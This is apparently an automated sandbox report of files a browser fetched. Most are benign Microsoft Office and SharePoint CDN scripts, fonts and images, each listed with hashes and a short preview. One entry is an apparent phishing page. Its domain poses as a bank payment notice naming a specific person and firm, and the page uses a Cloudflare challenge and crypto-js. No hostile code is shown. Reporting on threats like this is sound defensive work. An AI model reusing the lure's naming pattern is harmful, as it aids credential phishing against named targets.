                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/31.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[31],{4841:function(e,t,n){n.d(t,{a:function(){return f}});var a=n(37),i=n("tslib_102"),r=n("react-lib"),o=n(33),s=n(47),c=n(1024),d=(0,o.a)(),l=function(e){function t(){return null!==e&&e.apply(this,arguments)||this}return(0,i.XJ)(t,e),t.prototype.render=function(){var e=this.props,t=e.message,n=e.styles,a=e.as,o=void 0===a?"div":a,l=e.className,u=d(n,{className:l});return r.createElement(o,(0,i.W_)({role:"status",className:u.root},(0,s.h)(this.props,s.f,["className"])),r.createElement(c.a,null,r.createElement("div",{className:u.screenReaderText},t)))},t.defaultProps={"aria-live":"polite"},t}(r.Component),u=n(46),f=(0,a.a)(l,function(e){return{root:e.className,screenReaderText:u.g}})}.,8197:function(e,t,n){n.d(t,{b:function(){return F},a:function(){return H}});var a={};n.r(a),n.d(a,{inputDisabled:function(){return E},inputFocused:function(){return w},picker:function(){return C},pickerInput:function(){return A
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (2626)
                                                  Category:downloaded
                                                  Size (bytes):5432
                                                  Entropy (8bit):5.135204702966227
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D1F93141BB96DCC28B153506C129FD52
                                                  SHA1:1FC4612B979D8B86558EB569CF8D6B82D68EE691
                                                  SHA-256:6FCD97A8FF29F144D2D695969F7913490D474845909DA101BFE03FA7D7098B00
                                                  SHA-512:1EE33921699C66D38FAAF3F8443BFF71AA4FA7C849D7F988316B9B0D9EC17E7A08E39F3C85F049853D097DEF58F6F4AE9B1D07BCF987B4488538587CF262D85F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/custom-formatter/en-us/custom-formatter.lib.resx-b6a460e3.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["custom-formatter.lib.resx"],{cfmt_752:function(e){e.exports=JSON.parse('{"g$":"Not submitted","Bt":"Requested","nO":"Rejected","cI":"Approved"}')}.,cfmt_988:function(e){e.exports=JSON.parse('{"cI":"Approved","vk":"Rejected","Bt":"Pending","Nc":"Draft","I8":"Scheduled"}')}.,cfmt_261:function(e){e.exports=JSON.parse('{"elmTypeMissing":"Must specify elmType.","elmTypeInvalid":"Invalid elmType: {0}. Must be one of {1}.","operatorMissing":"Missing operator in expression: {0}.","operatorInvalid":"\\u0027{0}\\u0027 is not a valid operator. It must be one of {1} in the expression {2}.","operandMissing":"There must be at least 1 operand in the expression {0}.","operandNOnly":"Expecting {0} operand(s) for the expression {1}.","operandInvalid":"Invalid operands are passed to the function","nan":"{0} is not a number. Number expected in the expression {1}.","notArray":"{0} is not an array, array expected in the expressio
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):3932
                                                  Entropy (8bit):4.37799644488752
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D41EE9813A334F89E963EF8CCAE66B86
                                                  SHA1:0BA2BAE19C3175B48095EB6CB9B703C095999FD9
                                                  SHA-256:D6ECB157B246102B938294E2C71CDBDF854A433BCD2CDF590AEBDB39F0BCAE1A
                                                  SHA-512:E6F04B332CB20F1475906F08D976C1DEFBA43357DE7CCCBB3EC65184A23E72021494DBA95C9B78A9794D51AA3E6B0DFF89216066D5849CC45B6456A3F2311928
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_people_dark.svg
                                                  Preview:<svg width="204" height="194" viewBox="0 0 204 194" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_1003_115049)">..<path opacity="0.2" d="M162 159C207.024 130.667 207.5 109 179.5 78.0004C171.5 69.1432 188.5 36.9996 179.5 24.5001C169.595 10.743 146.5 1.5 113.5 24.5001C99.7171 34.1064 88 39.9662 70 33.9998C42.5 24.8844 32.5003 48.0004 32.5003 70.5004C32.5003 98.7743 28.0012 102 15.5006 125.5C3.00002 149 15.1691 170.444 41 179.5C72.2157 190.446 133.181 177.131 162 159Z" fill="#797673"/>..<path d="M137.4 100.9L44.4998 125.1C42.3998 125.7 40.1998 124.4 39.5998 122.2L25.4998 68.0002C24.8998 65.9002 26.1998 63.7002 28.3998 63.1002L121.3 38.9002C123.4 38.3002 125.6 39.6002 126.2 41.8002L140.3 96.0002C140.8 98.1002 139.5 100.3 137.4 100.9Z" fill="#605D5A"/>..<path d="M57.3004 85.0998C61.6634 85.0998 65.2004 81.5629 65.2004 77.1998C65.2004 72.8368 61.6634 69.2998 57.3004 69.2998C52.9373 69.2998 49.4004 72.8368 49.4004 77.1998C49.4004 81.5629 52.9373 85.0998 57.3004 85.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (59728)
                                                  Category:dropped
                                                  Size (bytes):152665
                                                  Entropy (8bit):5.341147828993421
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:307376C5D1BA1B4C17A5FAF244EEE399
                                                  SHA1:DCB1F9A16A3A0B00560FD108864E78E37D8A907C
                                                  SHA-256:559DA8F6A12C5F23D3F2978B156D4D175864C7F39F9CA117D1C14B9970948331
                                                  SHA-512:0A150BA48EBAD54DE9EA60C2612316830970887230FB671477F89EB505EC5B4EAEEB32CEB3AB9A4F30C7E2A7D7E779B2ACC19D4A6EB893992DA88ED49DAE9514
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:/*! For license information please see spwebworker.js.LICENSE.txt */.(()=>{"use strict";var e=[(e,t,n)=>{function a(e,t){for(var n="";n.length<e;){var a=16*(null!=t?t:Math.random)();n+=(a|=0).toString(16)}return n}function i(){return crypto.getRandomValues(new Uint32Array(1))[0]/4294967296}n.r(t),n.d(t,{Empty:()=>r,_guidRegEx:()=>o,cryptoRandom:()=>i,generate:()=>s,isValidGuid:()=>u,normalizeDashes:()=>l,normalizeLower:()=>c,normalizeUpper:()=>d});var r="00000000-0000-0000-0000-000000000000",o=/^[0-9a-f]{8}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{12}$/i;function s(e){var t=[];t.push(a(8,e)),t.push(a(4,e));var n="4"+a(3,e);t.push(n);var i=a(4,e),r=parseInt(i[0],16);return r&=3,i=(r|=8).toString(16)+i.substr(1),t.push(i),t.push(a(12,e)),t.join("-")}function c(e,t){return void 0===t&&(t=!1),e?f(e.toLowerCase(),t):""}function d(e,t){return void 0===t&&(t=!1),e?f(e.toUpperCase(),t):""}function l(e,t){if(void 0===t&&(t=!1),e){var n=e.replace(/[^A-Fa-f0-9]/g,"");if(32===n.length)retu
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 4420, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):4420
                                                  Entropy (8bit):7.8717958876615155
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:AA6E587223473C58C0D7C2FE8DC43833
                                                  SHA1:91585EAFF9D10CD1ABE7B047C4E0B25B4D864C11
                                                  SHA-256:9825A2E4961A8CC3035E697B8339FC34879FA028F4EF7F2209E5970EDF63AC0F
                                                  SHA-512:4D72C9CC1A993FEC25DB337EAAB6B1435C534F764A706ADF3027486C1063035413AF304ED33E69B8D425192596F78B7081D87C819DE9DE00D3645FEEA46F4BAB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-21-f891c3db.woff
                                                  Preview:wOFF.......D.......l........................OS/2.......G...`@^wAcmap...P...p.....$..gasp................glyf...........X.bj<head.......2...6#.hhea...........$....hmtx...(...........floca...H...,...,+@/dmaxp...t....... .#..name...........O..R.post...0....... ...Gx.c`a..8...........L..t.!.I.(......@9......VP`p..../...!...X <....P..O.x.c```f.`..F.....1..,..`Z.(..#.G....?..T...c.m?v.......30........}:......'....g.G.{.....Cm..........)4.............x..Vk....>w..{.Nl..Y.............y.<.y.Iw.....i......\.4.T..JE.m..*..-..TB.J....j!.B.5U.Q.......^....].;w.....w......).<..........=....8......g..h....B@..B...p.....3..~.4..+~b$M.P.....GBaM.X..(.'I.=)q..~. .b.m....l$3B:CFH./hj\..e.b.4.Lg.T.h.....DK.s..gY.~B.P..x.'..f.1o..\..j.t.ojB.BJ..5.......Xj.r."sA...|........".hpP......W...Uu..5=.......m..d........$.+.^......"{.%3..}E>...{......P...D#.I..P8....h(.-....h..4j>...x.}lG?Y..#.......!....Ic{....w.......z..G.'...f..gr..[..t......%Y$K.Q3..p....QT..I.....X0..q..H
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):30778
                                                  Entropy (8bit):7.9906229092027425
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:E7D3A17DA96B7F43961EEC4ABCED97B4
                                                  SHA1:0AF0C5A2A390B75A0F81E75D1DC67D14C675348F
                                                  SHA-256:49549A16F46767FA5C801DE6E26A1C45112B83653F048BC9A78BA7210F8A14A8
                                                  SHA-512:BA5B88D16D03168919B6E633A0AC72DE155ECCC6C1CE1304DA2A29E8288D272BD320F9F6307DE24C046E7E85701C7CFC768040385AE70002D341F90304305A49
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_meeting_v3_dark.webp
                                                  Preview:RIFF2x..WEBPVP8X..............ALPH|N.....m$9...>N.....BD.'..u.5.v.!..L.E.2..y.h..!..EB...T.H.w.]UD.&..Ka..,...>z..m.AI.....C....*.K..U.L..g..sTPjwp2...f..x..if.4.3.m.....{.")....5.:y8....;...w...{.Zg?......X...m.$#..+.v.<...$Y.$..........g.Tb.u.X....AQ.d.ms.@..=`.n.HQq>@.l....^.>..J..,.f.s.....l7s...!..eh46|v.......b..=+...OR...... I..Jc.....f%....F.............?............%h..F.m...9P0.Z..r..E.A..-.p)....#0....l)..p.Al..^....).Cj..5.L.qm....D.i...v[?....6....hA3d:S......{...C..".r.Jw...^...r...Y.lR....4.;......C.bo..7..+.k..?+.j.7|.^v......G......x.....'....hC.nP.jE!.$.iS$....RI..-...n _.a.~+.[)b!..."P.[yM.8M.uQ ...".....8..*..t.^Rm....p.%(n-."G.J9.....;H.....w.PE..y...`.@.....V.....x...{!.X...`..k,L.K........:.W...u.\.^..=".@@.2}..KI...D.@5A...7J{p;.7..krY..5=....\.gN.$......u.P....!E.....s..+..O...@.^t....c.I-T...\.......<UV.A...V$..K.......5K...7t....H....6.tr.rn=3`B..j...e...%}..0...........a........$@..tv.......$....t'..x.p....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):742
                                                  Entropy (8bit):5.242289206051459
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:517818491E8F06C178BFA9446E3CAD2D
                                                  SHA1:5B7D5C10D555E618C09247C1278EE80CFD249BDB
                                                  SHA-256:D27A4A00EEF6AAA419D3C8D6DC41F528CEBBD7B6ADBC5F7541B4EE81BD79CC7C
                                                  SHA-512:56788EE2E7A2DB2B0C336F50FF71025D622B2346658B326DFD7E407A8E5AFB14DA2C6B2E0E833B0336D603973A8B676725F44CE2FFE8CFC8DCE3CBB0304429D3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://hidrotehnik-my.sharepoint.com/_layouts/15/spwebworkerproxy.ashx
                                                  Preview:self._perfMarks = {};.self._markPerfStage=function(key) {if(self.performance && typeof self.performance.now === 'function'){self._perfMarks[key]=self.performance.now();} else{self._perfMarks[key]=Date.now();} if (self.performance && typeof self.performance.mark === 'function') {self.performance.mark(key);}};.(typeof self._markPerfStage === 'function' && self._markPerfStage('importScriptsStart'));.self._cdnBaseUrl = 'https://res-1.cdn.office.net/files/odsp-web-prod_2024-08-23.009/';.importScripts('https://res-1.cdn.office.net/files/odsp-web-prod_2024-08-23.009/spwebworker.js');.self._wwKillSwitches = {'48FEA7A5-5A77-480B-94EB-43F1937DF4D6':true};.(typeof self._markPerfStage === 'function' && self._markPerfStage('importScriptsEnd'));.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2839), with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):5975
                                                  Entropy (8bit):5.739400751076182
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6F3F771A4AA9196000D65AD595ED8886
                                                  SHA1:9759232986DB573E98497D63C97E77CD4FD0F885
                                                  SHA-256:6CAD6C07C0085E4BAED1F0D7A7BF38802BECF5C5090C96B344B325E979013DA2
                                                  SHA-512:A0498D2BD412362B3D845D7678D565ADC9E9FFA42D0FA635888159077433B54A45D5A4C98F90C7BE8BCA3EE50393BAD8657A1AA5A75054A914E6ADD2E9E99751
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/
                                                  Preview:<html>.. <head>.. <title>.</title>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#raccoon {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#gainsay {width: 130px;margin-top: 179px;}#yarrow {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#yarrow>.waddle {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#yarrow>.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 72x72, components 3
                                                  Category:dropped
                                                  Size (bytes):1111
                                                  Entropy (8bit):7.405307395069312
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:7CA45AC469A9E9A14FB7D1F97E24BB7B
                                                  SHA1:D42EDCB2961FC86FE2E966813D789B8AB6D19074
                                                  SHA-256:1EB145EB2F7B19F9DA08D04C0AC27F9AEB98FE2842C0260C5019AAD767368C68
                                                  SHA-512:AB92574C0F44A0300F2873DE0397B5826AF8B1F6EDA70BD7695E8968B6FD86CBAB635CBB5733949E0DBCFBA58CC7947130D59E93D532134FB874AC88253E8DC1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......H.H.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....t..3...=..I@....F~..%t.W...,..nV q..sy.~Tg..Wt....6.m...5.k.$.i.Q....q..2.........?O.J(.O_.RR.........n.hQ.Qr.z....].q...c.P1..e.^..z.*+....H$.W\.....9..+..Q...S]...y..H.~u...QE.)...JS...{J.....+l.9w.Oo..R.F.T..k..C].C.@.`....O#..Im.i...Wn.'.Mgj^...~..T../8...@..ak..v..k...q.....X.......I.9...t....M~C.Q.9...@....\.}.a...f.m"..[J.K.);........g.E.....+......6
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (16126)
                                                  Category:downloaded
                                                  Size (bytes):23381
                                                  Entropy (8bit):6.0756919868692565
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4F20C63B3E8B815138C0B2D3CB0D46CA
                                                  SHA1:91871AE7E144C2FB7032015F1FCA8EB4CBF7DFF9
                                                  SHA-256:818C1DBDB58781FF2C267D64F30B8422C02C4EB55232DF344064508D413103E8
                                                  SHA-512:D1029B1A21AA24F673E02A9E15B24276BA7B01A87504588CF4737F418E6F2011F6062197AAEB36C0857B009697718EE49BEAF5B9F487DC3254FA6582F611874E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/media/fluentMtc.css
                                                  Preview:.od-Branding {. display: none !important;.}...engine-video-root:focus-visible {. outline: "2px solid white";. outline-offset: -2px;.}...critical-playback-container {. container-type: size;.}.@media screen and (-ms-high-contrast: active), (forced-colors: active) {. .critical-playback-container {. background-color: Canvas;. outline-color: ButtonText;. border-style: solid;. box-sizing: border-box;. }.}..critical-playback-container--border-fix {. border-radius: inherit;.}..critical-playback-container--border-fix .video-engine-container {. border-radius: inherit;.}..critical-playback-container--border-fix .video-engine-container .engine-video-root:focus-visible + .video-outline-container {. border-radius: inherit;.}..critical-playback-container--border-fix .video-engine-container .engine-video-root:focus-visible + .video-outline-container::after {. border-radius: inherit;. box-sizing: border-box;. width: 100%;. height: 100%;.}..critical-playback-container--outline-f
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (3593)
                                                  Category:dropped
                                                  Size (bytes):13209
                                                  Entropy (8bit):5.407013159828908
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B20F3B3812D0D08922792B0FD1254E28
                                                  SHA1:7FC9A8CEDFF6593DA90A67493BE9E0E95692E3A9
                                                  SHA-256:6EBEC5A86C06BE947E92BDE32C7E00E8AB39B7B35B79E532EDAA30CBC6B1869C
                                                  SHA-512:EB6F0B4F1C72F722470AC6B244C2E3A3ADA9A61C4CD4FB8AAADEEB3344BFF3523CA5F9E8400A360F5CDB9F49D1A06DF3447A1E43220D80F162A87A65E5B60FFD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[313],{4663:function(e,t,n){n.d(t,{a:function(){return O}});var a=n("tslib_102"),i=n("react-lib"),r=n(3),o=n(8),s=n(38),c=n(9),d=n("odsp.util_460"),l=n(45),u=n(34),f=n(6),p=n(15),m=n(4101),_=n(3520),h=n(56),b=n(3517),g=n(41),v=n(66),y=n(352),S=n(5),D=n(11),I=(0,n(19).a)(function(){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,Promise.all([n.e("ondemand.resx"),n.e(0),n.e(2),n.e(4),n.e(3),n.e(5),n.e(7),n.e(43),n.e(940)]).then(n.bind(n,4291))];case 1:return[2,e.sent().ApproveRejectDialog]}})})}),x=(0,r.c)(function(e,t){var n=t.onContinue,r=t.onCancel,o=t.resolve,s=t.reject,c=(0,a.l7)(t,["onContinue","onCancel","resolve","reject"]);return i.createElement(I,(0,a.W_)({},c,{onContinue:function(e){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(t){switch(t.label){case 0:return n?[4,n(e)]:[3,2];case 1:t.sent(),t.label=2;case 2:
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 15812, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):15812
                                                  Entropy (8bit):7.97362551016411
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E4D0BA1A29BE083A0739C928036F49B2
                                                  SHA1:46AC8AAAB71AE649A2F7672A6BF3A2331A9EB5BC
                                                  SHA-256:2ED1A2974B878ACF7B2327BB61D47DDCF3819C2C05CB6C4C73F6680752996FD3
                                                  SHA-512:254F063591AF16CB7A38243F114E735D8E773CF5AA6895E8118B979508C8303FF083BC01505FF8AB496FDE0C9E361D761349C0484826F0A71CC4EB6ABCC33436
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-0-433a26c6.woff
                                                  Preview:wOFF......=.......o.........................OS/2.......G...`*.b_cmap...P........s.Zsgasp...h............glyf...t..6!..`|.c..head..8....6...6#.hhea..8........$....hmtx..8....>.......-loca..9,...........`maxp..9........ .z.)name..:........O..R.post..=........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px4......!...X <....=).f.x....+.q....w.A.i.y}..#.....%.6.Z....._.ar...$..I...mO....h>.Rr^y......<.m..B.xn./..%^..^.dJMC6.]...J..&@-...J;.t.$D.!F.c.%V..F.u6H...{.s.1'..p..........#.8..f'......qB.I',..#l.]R..;'<}...rv.N.n[a....l.>...].JG...PFgJ.TQm).Q.kPaw.kQA.Ks....q.F......+nye.7.{}..9...............x..|.x...93....eI.,.dY.....%...;.c...<.@.$@.. $<.P.I....m.>.%i..ui.v.n.R..n.z.v..K.vo.-.5...gfd.6{o7.hf.9.....>C8..!.{.}.'"!..5.^..po.._ /....&...=6.7.pD"P).....u....;5..f..d...W...j..8..,.E..V7..6...4.p:-.M...7-.k.'....De.H.....J|n-.u.$W.g.;...JH....8'..7,..5...(..2....^..L.j.V_.E.pO...e.<.......6r'.'......j.M..|0z..1...LP...S.Rc..S....a.......s,.7D..W
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (9456)
                                                  Category:downloaded
                                                  Size (bytes):19087
                                                  Entropy (8bit):5.50603635407794
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:31EBCCF8D84D3E49266EB2C0B5165E3A
                                                  SHA1:96312FB168973AFD4BFF205C6817541030453C87
                                                  SHA-256:AEB9444C01712CA9655991CF73BE0D98D4F577FB55EF533212DC25A6E91B77B6
                                                  SHA-512:C657A061F84883F2ACF20F108CF1F96C6D554B147721AAAC79ECF2388F5282DD1D995454A7668CACC3CE3370A5BA2030F44C8D0D21E43A8BB1ED3E6414D1684B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/88105.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[88105],{115180:(e,t,n)=>{n.d(t,{J6x:()=>s,Q5n:()=>u,RW6:()=>l,W9n:()=>d,Wb0:()=>o,Y9O:()=>r,kMn:()=>c,pjZ:()=>i});var a=n(790599);const i=(0,a.k)("CheckmarkCircleFilled","1em",["M10 2a8 8 0 1 1 0 16 8 8 0 0 1 0-16Zm3.36 5.65a.5.5 0 0 0-.64-.06l-.07.06L9 11.3 7.35 9.65l-.07-.06a.5.5 0 0 0-.7.7l.07.07 2 2 .07.06c.17.11.4.11.56 0l.07-.06 4-4 .07-.08a.5.5 0 0 0-.06-.63Z"]),r=(0,a.k)("ChevronDownRegular","1em",["M15.85 7.65c.2.2.2.5 0 .7l-5.46 5.49a.55.55 0 0 1-.78 0L4.15 8.35a.5.5 0 1 1 .7-.7L10 12.8l5.15-5.16c.2-.2.5-.2.7 0Z"]),o=(0,a.k)("ChevronLeftFilled","1em",["M12.27 15.8a.75.75 0 0 1-1.06-.03l-5-5.25a.75.75 0 0 1 0-1.04l5-5.25a.75.75 0 1 1 1.08 1.04L7.8 10l4.5 4.73c.29.3.28.78-.02 1.06Z"]),s=(0,a.k)("ChevronLeftRegular","1em",["M12.35 15.85a.5.5 0 0 1-.7 0L6.16 10.4a.55.55 0 0 1 0-.78l5.49-5.46a.5.5 0 1 1 .7.7L7.2 10l5.16 5.15c.2.2.2.5 0 .7Z"]),c=(0,a.k)("ChevronRightFilled","1em",["M7.73
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (1818)
                                                  Category:dropped
                                                  Size (bytes):2146
                                                  Entropy (8bit):5.151346564837747
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:24FB282731A62AF99E09328A5AB9A6D7
                                                  SHA1:ADC84D2AC74B44AC288ADADAD34B190D9C31ECAF
                                                  SHA-256:8197E938A5D5415740F5A56982401D989CBB026A0B6F0BB4246F39481325B576
                                                  SHA-512:EE7CF9BA055769B3274C331A2689865B927B5909F9E1F188ED911687102E59A0B0E05AEDB9C7889D5541FC80162F2FBF0DCF473FA81C5D700F99C7A1797405F3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1663],{3645:function(e,t,n){n.r(t),n.d(t,{ShowFiltersHandler:function(){return p}});var a=n("tslib_102"),i=n(2457),r=n(2600),o=n(197),s=n(2648),c=n(294),d=n(103),l=n(2465),u=n(20),f=n(23),p=function(e){function t(t){void 0===t&&(t={});var n=e.call(this,t)||this;return n.state=n.createPureComputed(n._computeState),n._urlDataSource=n.resources.consume(d.bb),n._viewParams=n.resources.consume(o.H),n}return(0,a.XJ)(t,e),t.prototype._computeState=function(){return{isAvailable:this._computeAvailability()}},t.prototype._computeAvailability=function(){var e=this._viewParams();return(0,f.di)(f.Td)&&this._urlDataSource.isCurrentQuery(c.a.Search,e)||this._urlDataSource.isCurrentQuery(c.a.SharedWithMe,e)},t}(i.c),m=(0,r.a)({name:"ShowFilters",source:{moduleDefinition:{path:"./ShowFiltersExecutor",getModule:function(){return u.c.resolve(Promise.all([n.e("odsp.react.lib"),n.e("ondemand.resx"),n.e(0),n.e(2),n.e(4),n.e(3),n.e
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 12708, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):12708
                                                  Entropy (8bit):7.969892237250595
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A23BDCE9D5468C27947C894C200E0226
                                                  SHA1:DE83485DF3C1AA465B814D526B016E2950C7DE83
                                                  SHA-256:9492BE8780DB85BC0FC24A9BABD69DB8F6DFA8A4ED62A7FFEC76CBF40F29AA8B
                                                  SHA-512:18EE53C80525101E065F888B5D02E40EC7F92620419836CB2F174BC6B172A27D0D589AEF1DE49B44D227670AB824B5E24768AAAAE43486256550F03E55F6044F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-14-92c5c291.woff
                                                  Preview:wOFF......1.......[T........................OS/2.......G...`2.qscmap...P...........<gasp...L............glyf...X..*...L$..x.head..,d...5...6#.hhea..,........$....hmtx..,....Q........loca..-..........K.*maxp..-........ .o..name..-........O..R.post..1........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px......!...X <....M....x...K+.q.......+eX)k.......L.L..,.../...5;..p_....d../...3.70...9...8f..R......0.(.\!.y.*k...,jQKZ...MmkW{...:.Nt.3..RW.....G=.E.z..o...O.:_... 0..e...-......"rot..Oe.]?.... hN7e.'....(0...t3LO.....I..c.,...A.v.h..2.2B#.@.C$0r..T.\u...S..r..............x..|.x...U]]..Rw."u.w..}.n.v.V.-.$.....^.....`0aIH $..Lv...$<O@.}.H2...y.d.,x..qf..b[..;.V.....|.]U...V..?.2..)B.G...'"!....Ak.pd2..d..........t.+P.....%q..l$;.~..,..3.|.a....Q...)k2....!#....u.-pW..pJ%...N4..D..:..a.....(.}|....:Gv..'7|..Gvt.).?..p..p{\......z....D.nIy.<.bOo.........a.4..@.EY.8ip.J.....Wd.K...}.....l.Y...'.r..gQ..\.W.uW^]{WK.H.?.tw.......wT..h.....+.u.....|Z
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (5394)
                                                  Category:downloaded
                                                  Size (bytes):10410
                                                  Entropy (8bit):5.390292418692173
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FBE6B13FBE8F20C7501E1C5B07756DF5
                                                  SHA1:D5CDB6F36B848B65A53C1AD01C445262BE38B4CB
                                                  SHA-256:A06422F83BDA0533F8E9F009E334915B3829494384E8B5039654E33D6E79C3E5
                                                  SHA-512:1CE1F088FF89914915019277C21201F242F5D31295E95592B77F2FA0B4AD1C2C704670EE5DF702893AFC750CA8CF61692E22ECEDC7D3DEB8BE3164839BF37FFF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/28.js
